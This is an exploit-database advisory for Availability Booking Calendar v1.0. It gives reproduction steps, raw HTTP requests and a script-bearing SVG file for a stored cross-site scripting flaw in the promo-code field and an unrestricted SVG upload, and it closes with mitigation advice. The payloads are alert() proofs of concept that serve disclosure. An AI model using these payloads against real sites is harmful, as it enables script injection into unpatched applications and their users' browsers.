header-logo
Suggest Exploit
vendor:
Availability Booking Calendar
by:
Andrey Stoykov
5.5
CVSS
MEDIUM
Cross-site scripting (XSS)
79
CWE
Product Name: Availability Booking Calendar
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:availability_booking_calendar:availability_booking_calendar:1.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
2023

Availability Booking Calendar v1.0 – Multiple Cross-site scripting (XSS)

This exploit allows an attacker to inject malicious JavaScript code into the web application, which is then executed by the victim's browser. The exploit is triggered when the user browses to the 'Bookings' page and selects 'All Bookings'. They can then edit a booking and enter a payload in the 'Promo Code' field. The payload in this case is 'TEST"><script>alert(`XSS`)</script>'. When the form is submitted, the payload is stored in the database and later displayed on the 'Bookings' page, resulting in the execution of the malicious script.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented. All user-supplied input should be validated and sanitized to prevent the execution of malicious code. Additionally, output encoding should be applied when displaying user-supplied data to ensure that any injected code is treated as plain text and not executed by the browser.
Source

Exploit-DB raw data:

# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com


XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]



// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
        </div>
[...]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]

Navigation

Suggest Exploit

Services By CQR